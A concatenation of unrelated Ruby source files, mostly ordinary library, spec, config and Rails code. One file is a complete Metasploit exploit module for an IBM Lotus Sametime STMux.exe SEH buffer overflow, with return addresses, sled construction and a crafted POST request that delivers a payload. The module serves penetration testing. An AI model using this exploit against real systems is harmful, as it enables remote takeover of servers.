      camelized = lower_case_and_underscored_word.to_s.gsub(/\/(.?)/) { "::" + $1.upcase }.gsub(/(^|_)(.)/) { $2.upcase }
      if first_letter_in_uppercase
        camelized
      else
        # Fixed: the previous implementation called String#first (an
        # ActiveSupport-only method) and recursed with a String where a
        # boolean was expected, raising NoMethodError on plain Ruby.
        lower_case_and_underscored_word[0, 1].to_s + camelized[1..-1].to_s
      end
    end

    # Resolves a "Foo::Bar" constant path to the constant itself.
    def constantize
      self.split("::").inject(Module) { |acc, val| acc.const_get(val) }
    end

    # Converts CamelCase/namespaced strings to underscored/path form.
    def underscore
      word = self.dup
      word.gsub!(/::/, '/')
      word.gsub!(/([A-Z]+)([A-Z][a-z])/, '\1_\2')
      word.gsub!(/([a-z\d])([A-Z])/, '\1_\2')
      word.tr!("-", "_")
      word.downcase!
      word
    end
  end
end
::String.send(:include, ::Fletcher::String)
| 26.911765 | 112 | 0.575956 |
module Tenpay
# Wraps Tenpay's order-query XML response and verifies its MD5 signature.
class QueryResponse
  # @param [String] response raw XML body returned by Tenpay
  def initialize(response)
    @body = response
  end

  # True when the embedded signature matches our recomputed MD5 digest.
  # NOTE(review): plain == is not a constant-time comparison; consider a
  # secure compare if timing attacks are a concern here.
  def valid?
    sign == Digest::MD5.hexdigest(sign_params).upcase
  end

  # True for a valid response whose pay_result code is '0'.
  def successful?
    valid? && pay_result == '0'
  end

  # Parsed XML document (memoized). Relies on the Hpricot gem.
  def doc
    @doc ||= Hpricot(@body)
  end

  # --- Field accessors: each extracts and memoizes one XML element's text ---

  def attach
    @attach ||= (doc / 'attach').inner_text
  end

  def cmdno
    @cmdno ||= (doc / 'cmdno').inner_text
  end

  def date
    @date ||= (doc / 'date').inner_text
  end

  def fee_type
    @fee_type ||= (doc / 'fee_type').inner_text
  end

  def pay_info
    @pay_info ||= (doc / 'pay_info').inner_text
  end

  def pay_result
    @pay_result ||= (doc / 'pay_result').inner_text
  end

  # Merchant-side order number (Tenpay's sp_billno element).
  def order_id
    @order_id ||= (doc / 'sp_billno').inner_text
  end

  def total_fee
    @total_fee ||= (doc / 'total_fee').inner_text
  end

  def transaction_id
    @transaction_id ||= (doc / 'transaction_id').inner_text
  end

  def sign
    @sign ||= (doc / 'sign').inner_text
  end

  private

  # Canonical parameter string that Tenpay signs; field order and the
  # trailing secret key must match the gateway's expectation exactly.
  def sign_params
    "attach=#{attach}&bargainor_id=#{Tenpay::Config.spid}&cmdno=#{cmdno}&date=#{date}&fee_type=#{fee_type}" +
      "&pay_info=#{pay_info}&pay_result=#{pay_result}&sp_billno=#{order_id}&total_fee=#{total_fee}&" +
      "transaction_id=#{transaction_id}&key=#{Tenpay::Config.key}"
  end
end
end
ac3ce30b8e5fa8d108b4a134aa08076149d6d671 | 1,203 | class Express < Formula
# cite Roberts_2012: "https://doi.org/10.1038/nmeth.2251"
desc "Streaming quantification for sequencing"
homepage "http://bio.math.berkeley.edu/eXpress/"
url "https://github.com/adarob/eXpress/archive/1.5.3.tar.gz"
sha256 "1c09fa067672ba2ccbac6901602f3e2d9b5e514ff1fe87f54163e94af69ff022"
head "https://github.com/adarob/eXpress.git"

bottle do
  root_url "https://linuxbrew.bintray.com/bottles-bio"
  cellar :any_skip_relocation
  sha256 "1f8d67bf11bf49458dcfa173c13722ab83b6b9a555a2fcc27048f5409d1cdf8b" => :mojave
  sha256 "aae8e9f53dc1ea615b5cafa70a954beba40abe40c0fb15026237e42ea6a86529" => :x86_64_linux
end

# Build-time dependencies (all marked :build).
depends_on "bamtools" => :build
depends_on "boost" => :build
depends_on "cmake" => :build
depends_on "gperftools" => :build
depends_on "protobuf" => :build

uses_from_macos "zlib"
def install
  # Use Homebrew's bamtools instead of the vendored copy: the build expects
  # bamtools/{include,lib} inside the source tree, so symlink Homebrew's
  # headers and libraries into place before configuring.
  mkdir "bamtools"
  ln_s Formula["bamtools"].include/"bamtools", "bamtools/include"
  ln_s Formula["bamtools"].lib, "bamtools/"
  system "cmake", ".", *std_cmake_args
  system "make", "install"
end
test do
  # Running express with no arguments exits with status 1; this just checks
  # the binary executes (no output assertion is made).
  shell_output("#{bin}/express 2>&1", 1)
end
end
| 33.416667 | 94 | 0.732336 |
require 'spec_helper'
# Probe methods used by the yield matchers below. The underscore prefix keeps
# them from colliding with the matchers themselves (some share a name).
module YieldHelpers
  # Accepts a block but deliberately never invokes it.
  def _dont_yield
  end

  # Invokes the supplied block exactly once with no arguments.
  def _yield_with_no_args(&block)
    block.call
  end

  # Invokes the supplied block exactly once, forwarding every argument.
  def _yield_with_args(*args, &block)
    block.call(*args)
  end
end
# Runs blocks through RSpec's instance_eval_with_args extension so the specs
# can verify yields that happen via instance_eval rather than a plain call.
class InstanceEvaler
  include RSpec::Matchers::Extensions::InstanceEvalWithArgs

  # Evaluates the block via instance_eval with no arguments.
  def yield_with_no_args(&block)
    instance_eval_with_args(&block)
  end

  # Evaluates the block via instance_eval, forwarding +args+.
  def yield_with_args(*args, &block)
    instance_eval_with_args(*args, &block)
  end

  # Evaluates the block once per supplied argument.
  def each_arg(*args, &block)
    args.each do |arg|
      instance_eval_with_args(arg, &block)
    end
  end
end
# Specs for the yield_control matcher: plain pass/fail plus the exact,
# at_least and at_most count modifiers.
describe "yield_control matcher" do
  include YieldHelpers
  extend YieldHelpers

  it_behaves_like "an RSpec matcher",
                  :valid_value => lambda { |b| _yield_with_no_args(&b) },
                  :invalid_value => lambda { |b| _dont_yield(&b) } do
    let(:matcher) { yield_control }
  end

  it 'has a description' do
    expect(yield_control.description).to eq("yield control")
  end

  describe "expect {...}.to yield_control" do
    it 'passes if the block yields, regardless of the number of yielded arguments' do
      expect { |b| _yield_with_no_args(&b) }.to yield_control
      expect { |b| _yield_with_args(1, 2, &b) }.to yield_control
    end

    it 'passes if the block yields using instance_eval' do
      expect { |b| InstanceEvaler.new.yield_with_no_args(&b) }.to yield_control
    end

    it 'fails if the block does not yield' do
      expect {
        expect { |b| _dont_yield(&b) }.to yield_control
      }.to fail_with(/expected given block to yield control/)
    end

    context "with exact count" do
      it 'fails if the block yields wrong number of times' do
        expect {
          expect { |b| [1, 2, 3].each(&b) }.to yield_control.twice
        }.to fail_with(/expected given block to yield control twice/)

        expect {
          expect { |b| [1, 2].each(&b) }.to yield_control.exactly(3).times
        }.to fail_with(/expected given block to yield control 3 times/)
      end

      it 'passes if the block yields the specified number of times' do
        expect { |b| [1].each(&b) }.to yield_control.once
        expect { |b| [1, 2].each(&b) }.to yield_control.twice
        expect { |b| [1, 2, 3].each(&b) }.to yield_control.exactly(3).times
      end
    end

    context "with at_least count" do
      it 'passes if the block yields the given number of times' do
        expect { |b| [1, 2].each(&b) }.to yield_control.at_least(2).times
        expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_least(3).times
      end

      it 'passes if the block yields more times' do
        expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_least(2).times
        expect { |b| [1, 2, 3, 4].each(&b) }.to yield_control.at_least(3).times
      end

      it 'allows :once and :twice to be passed as counts' do
        expect { |b| [1].each(&b) }.to yield_control.at_least(:once)
        expect { |b| [1, 2].each(&b) }.to yield_control.at_least(:once)
        expect {
          expect { |b| [].each(&b) }.to yield_control.at_least(:once)
        }.to fail_with(/at least once/)

        expect { |b| [1, 2].each(&b) }.to yield_control.at_least(:twice)
        expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_least(:twice)
        expect {
          expect { |b| [1].each(&b) }.to yield_control.at_least(:twice)
        }.to fail_with(/at least twice/)
      end

      it 'fails if the block yields too few times' do
        expect {
          expect { |b| _yield_with_no_args(&b) }.to yield_control.at_least(2).times
        }.to fail_with(/expected given block to yield control at least twice/)
      end
    end

    context "with at_most count" do
      it 'passes if the block yields the given number of times' do
        expect { |b| [1, 2].each(&b) }.to yield_control.at_most(2).times
        expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_most(3).times
      end

      it 'passes if the block yields fewer times' do
        expect { |b| [1, 2].each(&b) }.to yield_control.at_most(3).times
      end

      it 'allows :once and :twice to be passed as counts' do
        expect { |b| [1].each(&b) }.to yield_control.at_most(:once)
        expect {
          expect { |b| [1, 2].each(&b) }.to yield_control.at_most(:once)
        }.to fail_with(/expected given block to yield control at most once/)

        expect { |b| [1, 2].each(&b) }.to yield_control.at_most(:twice)
        expect {
          expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_most(:twice)
        }.to fail_with(/expected given block to yield control at most twice/)
      end

      it 'fails if the block yields too many times' do
        expect {
          expect { |b| [1, 2, 3].each(&b) }.to yield_control.at_most(2).times
        }.to fail_with(/expected given block to yield control at most twice/)
      end
    end
  end

  describe "expect {...}.not_to yield_control" do
    it 'passes if the block does not yield' do
      expect { |b| _dont_yield(&b) }.not_to yield_control
    end

    it 'fails if the block does yield' do
      expect {
        expect { |b| _yield_with_no_args(&b) }.not_to yield_control
      }.to fail_with(/expected given block not to yield control/)
    end

    it 'fails if the expect block does not accept an argument' do
      expect {
        expect { }.not_to yield_control
      }.to raise_error(/expect block must accept an argument/)
    end

    it 'raises an error if the expect block arg is not passed to a method as a block' do
      expect {
        expect { |b| }.not_to yield_control
      }.to raise_error(/must pass the argument.*as a block/)
    end
  end
end
# Specs for the yield_with_no_args matcher: it requires exactly one yield
# carrying zero arguments (even a yielded false counts as an argument).
describe "yield_with_no_args matcher" do
  include YieldHelpers
  extend YieldHelpers

  it_behaves_like "an RSpec matcher",
                  :valid_value => lambda { |b| _yield_with_no_args(&b) },
                  :invalid_value => lambda { |b| _dont_yield(&b) } do
    let(:matcher) { yield_with_no_args }
  end

  it 'has a description' do
    expect(yield_with_no_args.description).to eq("yield with no args")
  end

  describe "expect {...}.to yield_with_no_args" do
    it 'passes if the block yields with no args' do
      expect { |b| _yield_with_no_args(&b) }.to yield_with_no_args
    end

    it 'passes if the block yields with no args using instance_eval' do
      expect { |b| InstanceEvaler.new.yield_with_no_args(&b) }.to yield_with_no_args
    end

    it 'fails if the block does not yield' do
      expect {
        expect { |b| _dont_yield(&b) }.to yield_with_no_args
      }.to fail_with(/expected given block to yield with no arguments, but did not yield/)
    end

    it 'fails if the block yields with args' do
      expect {
        expect { |b| _yield_with_args(1, &b) }.to yield_with_no_args
      }.to fail_with(/expected given block to yield with no arguments, but yielded with arguments/)
    end

    it 'fails if the block yields with arg false' do
      expect {
        expect { |b| _yield_with_args(false, &b) }.to yield_with_no_args
      }.to fail_with(/expected given block to yield with no arguments, but yielded with arguments/)
    end

    it 'raises an error if it yields multiple times' do
      expect {
        expect { |b| [1, 2].each(&b) }.to yield_with_no_args
      }.to raise_error(/not designed.*yields multiple times/)
    end
  end

  describe "expect {...}.not_to yield_with_no_args" do
    it "passes if the block does not yield" do
      expect { |b| _dont_yield(&b) }.not_to yield_with_no_args
    end

    it "passes if the block yields with args" do
      expect { |b| _yield_with_args(1, &b) }.not_to yield_with_no_args
    end

    it "fails if the block yields with no args" do
      expect {
        expect { |b| _yield_with_no_args(&b) }.not_to yield_with_no_args
      }.to fail_with(/expected given block not to yield with no arguments, but did/)
    end

    it 'fails if the expect block does not accept an argument' do
      expect {
        expect { }.not_to yield_with_no_args
      }.to raise_error(/expect block must accept an argument/)
    end

    it 'raises an error if the expect block arg is not passed to a method as a block' do
      expect {
        expect { |b| }.not_to yield_with_no_args
      }.to raise_error(/must pass the argument.*as a block/)
    end
  end
end
# Specs for the positive and negative forms of the `yield_with_args`
# matcher: bare usage (any args), exact values, and value matching via
# `===` (so regexps match strings and classes match instances).
describe "yield_with_args matcher" do
  include YieldHelpers
  extend YieldHelpers
  # Shared examples verifying the generic RSpec matcher protocol.
  it_behaves_like "an RSpec matcher",
      :valid_value => lambda { |b| _yield_with_args(1, &b) },
      :invalid_value => lambda { |b| _dont_yield(&b) } do
    let(:matcher) { yield_with_args }
  end
  it 'has a description' do
    expect(yield_with_args.description).to eq("yield with args")
    expect(yield_with_args(1, 3).description).to eq("yield with args(1, 3)")
    expect(yield_with_args(false).description).to eq("yield with args(false)")
  end
  describe "expect {...}.to yield_with_args" do
    it 'passes if the block yields with arguments' do
      expect { |b| _yield_with_args(1, &b) }.to yield_with_args
    end
    it 'fails if the block does not yield' do
      expect {
        expect { |b| _dont_yield(&b) }.to yield_with_args
      }.to fail_with(/expected given block to yield with arguments, but did not yield/)
    end
    it 'fails if the block yields with no arguments' do
      expect {
        expect { |b| _yield_with_no_args(&b) }.to yield_with_args
      }.to fail_with(/expected given block to yield with arguments, but yielded with no arguments/)
    end
    # This matcher only supports blocks that yield exactly once.
    it 'raises an error if it yields multiple times' do
      expect {
        expect { |b| [1, 2].each(&b) }.to yield_with_args
      }.to raise_error(/not designed.*yields multiple times/)
    end
  end
  describe "expect {...}.not_to yield_with_args" do
    it 'fails if the block yields with arguments' do
      expect {
        expect { |b| _yield_with_args(1, &b) }.not_to yield_with_args
      }.to fail_with(/expected given block not to yield with arguments, but did/)
    end
    it 'passes if the block does not yield' do
      expect { |b| _dont_yield(&b) }.not_to yield_with_args
    end
    it 'passes if the block yields with no arguments' do
      expect { |b| _yield_with_no_args(&b) }.not_to yield_with_args
    end
    it 'fails if the expect block does not accept an argument' do
      expect {
        expect { }.not_to yield_with_args
      }.to raise_error(/expect block must accept an argument/)
    end
    it 'raises an error if the expect block arg is not passed to a method as a block' do
      expect {
        expect { |b| }.not_to yield_with_args
      }.to raise_error(/must pass the argument.*as a block/)
    end
  end
  describe "expect {...}.to yield_with_args(3, 17)" do
    it 'passes if the block yields with the given arguments' do
      expect { |b| _yield_with_args(3, 17, &b) }.to yield_with_args(3, 17)
    end
    it 'passes if the block yields with the given arguments using instance_eval' do
      expect { |b| InstanceEvaler.new.yield_with_args(3, 17, &b) }.to yield_with_args(3, 17)
    end
    it 'fails if the block does not yield' do
      expect {
        expect { |b| _dont_yield(&b) }.to yield_with_args(3, 17)
      }.to fail_with(/expected given block to yield with arguments, but did not yield/)
    end
    it 'fails if the block yields with no arguments' do
      expect {
        expect { |b| _yield_with_no_args(&b) }.to yield_with_args(3, 17)
      }.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
    end
    it 'fails if the block yields with different arguments' do
      expect {
        expect { |b| _yield_with_args("a", "b", &b) }.to yield_with_args("a", "c")
      }.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
    end
  end
  describe "expect {...}.not_to yield_with_args(3, 17)" do
    it 'passes if the block yields with different arguments' do
      expect { |b| _yield_with_args("a", "b", &b) }.not_to yield_with_args("a", "c")
    end
    it 'fails if the block yields with the given arguments' do
      expect {
        expect { |b| _yield_with_args("a", "b", &b) }.not_to yield_with_args("a", "b")
      }.to fail_with(/expected given block not to yield with arguments, but yielded with expected arguments/)
    end
  end
  # Regression coverage: a yielded `false` is a real value and must not be
  # treated as "nothing was yielded".
  describe "expect {...}.to yield_with_args( false )" do
    it 'passes if the block yields with the given arguments' do
      expect { |b| _yield_with_args(false, &b) }.to yield_with_args(false)
    end
    it 'passes if the block yields with the given arguments using instance_eval' do
      expect { |b| InstanceEvaler.new.yield_with_args(false, &b) }.to yield_with_args(false)
    end
    it 'fails if the block does not yield' do
      expect {
        expect { |b| _dont_yield(&b) }.to yield_with_args(false)
      }.to fail_with(/expected given block to yield with arguments, but did not yield/)
    end
    it 'fails if the block yields with no arguments' do
      expect {
        expect { |b| _yield_with_no_args(&b) }.to yield_with_args(false)
      }.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
    end
    it 'fails if the block yields with different arguments' do
      expect {
        expect { |b| _yield_with_args(false, &b) }.to yield_with_args(true)
      }.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
    end
  end
  # Expected values are compared with `===`, so regexps match yielded strings.
  describe "expect {...}.to yield_with_args(/reg/, /ex/)" do
    it "passes if the block yields strings matching the regexes" do
      expect { |b| _yield_with_args("regular", "expression", &b) }.to yield_with_args(/reg/, /ex/)
    end
    it "fails if the block yields strings that do not match the regexes" do
      expect {
        expect { |b| _yield_with_args("no", "match", &b) }.to yield_with_args(/reg/, /ex/)
      }.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
    end
  end
  # Classes also match via `===` (instance-of), and exact class objects match too.
  describe "expect {...}.to yield_with_args(String, Fixnum)" do
    it "passes if the block yields objects of the given types" do
      expect { |b| _yield_with_args("string", 15, &b) }.to yield_with_args(String, Fixnum)
    end
    it "passes if the block yields the given types" do
      expect { |b| _yield_with_args(String, Fixnum, &b) }.to yield_with_args(String, Fixnum)
    end
    it "fails if the block yields objects of different types" do
      expect {
        expect { |b| _yield_with_args(15, "string", &b) }.to yield_with_args(String, Fixnum)
      }.to fail_with(/expected given block to yield with arguments, but yielded with unexpected arguments/)
    end
  end
end
# Specs for `yield_successive_args`, the only yield matcher that supports
# blocks which yield more than once; each yield is matched in order.
describe "yield_successive_args matcher" do
  include YieldHelpers
  extend YieldHelpers
  it_behaves_like "an RSpec matcher",
      :valid_value => lambda { |b| [1, 2].each(&b) },
      :invalid_value => lambda { |b| _dont_yield(&b) } do
    let(:matcher) { yield_successive_args(1, 2) }
  end
  it 'has a description' do
    expect(yield_successive_args(1, 3).description).to eq("yield successive args(1, 3)")
    expect(yield_successive_args([:a, 1], [:b, 2]).description).to eq("yield successive args([:a, 1], [:b, 2])")
  end
  describe "expect {...}.to yield_successive_args([:a, 1], [:b, 2])" do
    it 'passes when the block successively yields the given args' do
      expect { |b| [ [:a, 1], [:b, 2] ].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
    end
    it 'fails when the block does not yield that many times' do
      expect {
        expect { |b| [[:a, 1]].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
      }.to fail_with(/but yielded with unexpected arguments/)
    end
    it 'fails when the block yields the right number of times but with different arguments' do
      expect {
        expect { |b| [ [:a, 1], [:b, 3] ].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
      }.to fail_with(/but yielded with unexpected arguments/)
    end
  end
  describe "expect {...}.to yield_successive_args(1, 2, 3)" do
    it 'passes when the block successively yields the given args' do
      expect { |b| [1, 2, 3].each(&b) }.to yield_successive_args(1, 2, 3)
    end
    it 'passes when the block successively yields the given args using instance_eval' do
      expect { |b| InstanceEvaler.new.each_arg(1, 2, 3, &b) }.to yield_successive_args(1, 2, 3)
    end
    it 'fails when the block does not yield the expected args' do
      expect {
        expect { |b| [1, 2, 4].each(&b) }.to yield_successive_args([:a, 1], [:b, 2])
      }.to fail_with(/but yielded with unexpected arguments/)
    end
  end
  describe "expect {...}.not_to yield_successive_args(1, 2, 3)" do
    it 'passes when the block does not yield' do
      expect { |b| _dont_yield(&b) }.not_to yield_successive_args(1, 2, 3)
    end
    it 'passes when the block yields the wrong number of times' do
      expect { |b| [1, 2].each(&b) }.not_to yield_successive_args(1, 2, 3)
    end
    it 'passes when the block yields the wrong arguments' do
      expect { |b| [1, 2, 4].each(&b) }.not_to yield_successive_args(1, 2, 3)
    end
    it 'fails when the block yields the given arguments' do
      expect {
        expect { |b| [1, 2, 3].each(&b) }.not_to yield_successive_args(1, 2, 3)
      }.to fail_with(/expected given block not to yield successively/)
    end
    it 'fails if the expect block does not accept an argument' do
      expect {
        expect { }.not_to yield_successive_args(1, 2, 3)
      }.to raise_error(/expect block must accept an argument/)
    end
    it 'raises an error if the expect block arg is not passed to a method as a block' do
      expect {
        expect { |b| }.not_to yield_successive_args(1, 2, 3)
      }.to raise_error(/must pass the argument.*as a block/)
    end
  end
  # Successive expected values also use `===`, so classes match instances.
  describe "expect {...}.to yield_successive_args(String, Fixnum)" do
    it "passes if the block successively yields objects of the given types" do
      expect { |b| ["string", 15].each(&b) }.to yield_successive_args(String, Fixnum)
    end
    it "passes if the block yields the given types" do
      expect { |b| [String, Fixnum].each(&b) }.to yield_successive_args(String, Fixnum)
    end
    it "fails if the block yields objects of different types" do
      expect {
        expect { |b| [15, "string"].each(&b) }.to yield_successive_args(String, Fixnum)
      }.to fail_with(/expected given block to yield successively with arguments/)
    end
  end
end
| 35.970874 | 112 | 0.650958 |
1c1b3ab2a8d7dba23f1a9e0dd033f52970baa3b8 | 2,561 | require 'presenters/v3/base_presenter'
require 'presenters/mixins/metadata_presentation_helpers'
module VCAP::CloudController::Presenters::V3
  # Renders a space quota as a V3 API hash, exposing only the spaces the
  # caller is allowed to see in the `relationships.spaces` section.
  class SpaceQuotaPresenter < BasePresenter
    # @param resource [Object] the space quota model being presented
    # @param show_secrets [Boolean] forwarded to BasePresenter
    # @param censored_message [String] redaction placeholder, forwarded to BasePresenter
    # @param all_spaces_visible [Boolean] true when the caller can see every
    #   space on the quota (skips the visible_space_guids filter)
    # @param visible_space_guids [Array<String>] guids of spaces the caller may see
    def initialize(
      resource,
        show_secrets: false,
        censored_message: VCAP::CloudController::Presenters::Censorship::REDACTED_CREDENTIAL,
        all_spaces_visible: false,
        visible_space_guids: []
    )
      super(resource, show_secrets: show_secrets, censored_message: censored_message)
      @visible_space_guids = visible_space_guids
      @all_spaces_visible = all_spaces_visible
    end
    # V3 JSON representation of the quota. Columns storing -1 ("unlimited")
    # are rendered as null via #unlimited_to_nil.
    def to_hash
      {
        guid: space_quota.guid,
        created_at: space_quota.created_at,
        updated_at: space_quota.updated_at,
        name: space_quota.name,
        apps: {
          total_memory_in_mb: unlimited_to_nil(space_quota.memory_limit),
          per_process_memory_in_mb: unlimited_to_nil(space_quota.instance_memory_limit),
          total_instances: unlimited_to_nil(space_quota.app_instance_limit),
          per_app_tasks: unlimited_to_nil(space_quota.app_task_limit),
        },
        services: {
          paid_services_allowed: space_quota.non_basic_services_allowed,
          total_service_instances: unlimited_to_nil(space_quota.total_services),
          total_service_keys: unlimited_to_nil(space_quota.total_service_keys),
        },
        routes: {
          total_routes: unlimited_to_nil(space_quota.total_routes),
          total_reserved_ports: unlimited_to_nil(space_quota.total_reserved_route_ports),
        },
        relationships: {
          organization: {
            data: { guid: space_quota.organization.guid }
          },
          spaces: {
            data: filtered_visible_spaces
          }
        },
        links: build_links,
      }
    end
    private
    # Alias for the presented resource, for readability below.
    def space_quota
      @resource
    end
    # Spaces on the quota, restricted to those the caller may see unless
    # the caller has global visibility (e.g. an admin).
    def filtered_visible_spaces
      visible_spaces = if @all_spaces_visible
                         space_quota.spaces
                       else
                         space_quota.spaces.select { |space| @visible_space_guids.include? space.guid }
                       end
      visible_spaces.map { |space| { guid: space.guid } }
    end
    # HATEOAS links for the quota and its owning organization.
    def build_links
      {
        self: { href: url_builder.build_url(path: "/v3/space_quotas/#{space_quota.guid}") },
        organization: { href: url_builder.build_url(path: "/v3/organizations/#{space_quota.organization.guid}") },
      }
    end
    # The database stores -1 for "unlimited"; the V3 API represents that as null.
    def unlimited_to_nil(value)
      value == -1 ? nil : value
    end
  end
end
| 32.833333 | 114 | 0.654041 |
4ad3ebed6ded57c82ef1b8e0daa6db0ef19856ac | 442 | name 'tcr_db2'
# Chef cookbook metadata for tcr_db2 (the cookbook name is declared above).
maintainer 'Ed Overton'
maintainer_email '[email protected]'
license 'Apache-2.0'
# Fixed user-facing typo: "datbase" -> "database".
description 'Installs/Configures IBM DB2 Enterprise Server version 10.5.x with TCR database'
version '1.0.0'
chef_version '>= 13.0'
supports 'redhat'
supports 'centos'
issues_url 'https://github.com/emo3/tcr_db2/issues'
# NOTE(review): source_url previously pointed at 'tcr_db2/tcr_db2', which does
# not match the org used by issues_url; aligned it with the 'emo3' org.
source_url 'https://github.com/emo3/tcr_db2'
depends 'db2'
depends 'server_utils'
4a70e0bd7d1e8c1bf0ef099a183c63d8ccd1fc98 | 3,727 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Exploit module for CVE-2008-2499: SEH overwrite in the Sametime
# Multiplexer (STMux.exe) triggered by an overlong POST request path.
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking
  include Msf::Exploit::Remote::Tcp
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow',
      'Description' => %q{
          This module exploits a stack buffer overflow in Lotus Domino\'s Sametime
        Server. By sending an overly long POST request to the Multiplexer
        STMux.exe service we are able to overwrite SEH. Based on the exploit
        by Manuel Santamarina Suarez.
      },
      'Author' => [ 'patrick', 'riaf <riaf[at]mysec.org>' ],
      'Arch' => [ ARCH_X86 ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
        [
          [ 'CVE', '2008-2499' ],
          [ 'OSVDB', '45610' ],
          [ 'BID', '29328' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ],
        ],
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform' => ['win'],
      'Targets' =>
        [
          # Per-target 'Ret' is a pop/pop/ret gadget in msvcr71.dll; 'Offset'
          # holds the popebx/popad repetition counts used in #exploit.
          # Patrick - Tested OK against Windows 2003 SP1 20081114
          [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
          [ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
          [ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
        ],
      'DisclosureDate' => 'May 21 2008',
      'DefaultTarget' => 1))
    register_options(
      [
        Opt::RPORT(1533),
      ], self.class)
  end
  # Fingerprints the service: looks for a Lotus-Domino banner on HEAD /,
  # then confirms the /CommunityCBR endpoint responds 200.
  # NOTE(review): the request terminator "\r\n\r\n" is emitted before the
  # User-Agent/Host lines are appended, so those headers follow the blank
  # line — confirm this is intentional for this service.
  def check
    connect
    req = "HEAD / HTTP/1.0\r\n\r\n"
    req << "User-Agent: Sametime Community Agent\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    sock.put(req)
    res = sock.get_once(-1,3) || ''
    disconnect
    if (res =~/Lotus-Domino/)
      connect
      req = "GET /CommunityCBR HTTP/1.0\r\n\r\n"
      req << "User-Agent: Sametime Community Agent\r\n"
      req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
      sock.put(req)
      res = sock.get_once(-1,3) || ''
      disconnect
      if (res =~/200 OK/)
        return Exploit::CheckCode::Detected
      end
    end
    return Exploit::CheckCode::Safe
  end
  # Builds the malicious POST path: padding + short-jump pair + SEH
  # overwrite (pop/pop/ret) + sleds that pivot into the payload, then sends
  # the request with the encoded payload as the body.
  def exploit
    connect
    pad1 = rand_text_alpha_lower(44)
    pad2 = rand_text_alpha_lower(29)
    # Patrick - We should use Metasm here.
    popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
    popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
    esp = "\xff\x24\x24" # dword ptr ss:[esp]
    jmp = "\x74\x23" + "\x75\x21" # je short, jnz short
    seh = [target['Ret']].pack('V')
    path = pad1 + jmp + seh + pad2 + popebx + popad + esp
    req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
    req << "User-Agent: Sametime Community Agent\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    req << "Content-Length: #{payload.encoded.length}\r\n"
    req << "Connection: Close\r\n"
    req << "Cache-Control: no-cache\r\n\r\n"
    req << payload.encoded
    sock.put(req)
    handler
    disconnect
  end
end
| 28.891473 | 141 | 0.610142 |
7a619bd473d98e0e5df70eb51633b825c9d76d59 | 290 | class ExpensesController < ApplicationController
before_action :authenticate_user!
before_action :event
decorates_assigned :event
def index
@expenses_decorator = ExpensesDecorator.new(event)
end
private
def event
@event ||= Event.find(params[:event_id])
end
end
| 17.058824 | 54 | 0.751724 |
911c7fdbd0cf6e6cab43108b6ed31c60da24cc56 | 300 | class CreateReviews < ActiveRecord::Migration[6.1]
def change
create_table :reviews do |t|
t.integer :rating
t.text :description
t.references :movie, null: false, foreign_key: true
t.references :user, null: false, foreign_key: true
t.timestamps
end
end
end
| 23.076923 | 57 | 0.67 |
61d3936ba61ecd65cce06067d0f12ce9abe72ab2 | 87 | module Whatnow
class Engine < ::Rails::Engine
isolate_namespace Whatnow
end
end | 17.4 | 32 | 0.747126 |
ed7f6501a8091a7869cea3683a26669c79c06ce0 | 3,929 | # Loads an image from a file
# Ruby-side documentation stubs for Raylib image functions. Each method's
# real behavior lives in the native C implementation named in its body
# comment; the bodies here only document the return types.
# Loads an image from a file.
# @param path [String]
# @return [Image]
def load_image(path)
  # mrb_load_image
  # src/mruby_integration/image.cpp
  Image.new
end
# Unloads an image
# @param image [Image]
# @return [nil]
def unload_image(image)
  # mrb_unload_image
  # src/mruby_integration/image.cpp
  nil
end
# Exports an image to a file
# @param image [Image]
# @param path [String]
# @return [nil]
def export_image(image, path)
  # mrb_export_image
  # src/mruby_integration/image.cpp
  nil
end
# Generates a new image of width by height in the specified colour.
# @param width [Integer]
# @param height [Integer]
# @param colour [Colour]
# @return [Image]
def generate_image_colour(width, height, colour)
  # mrb_generate_image_colour
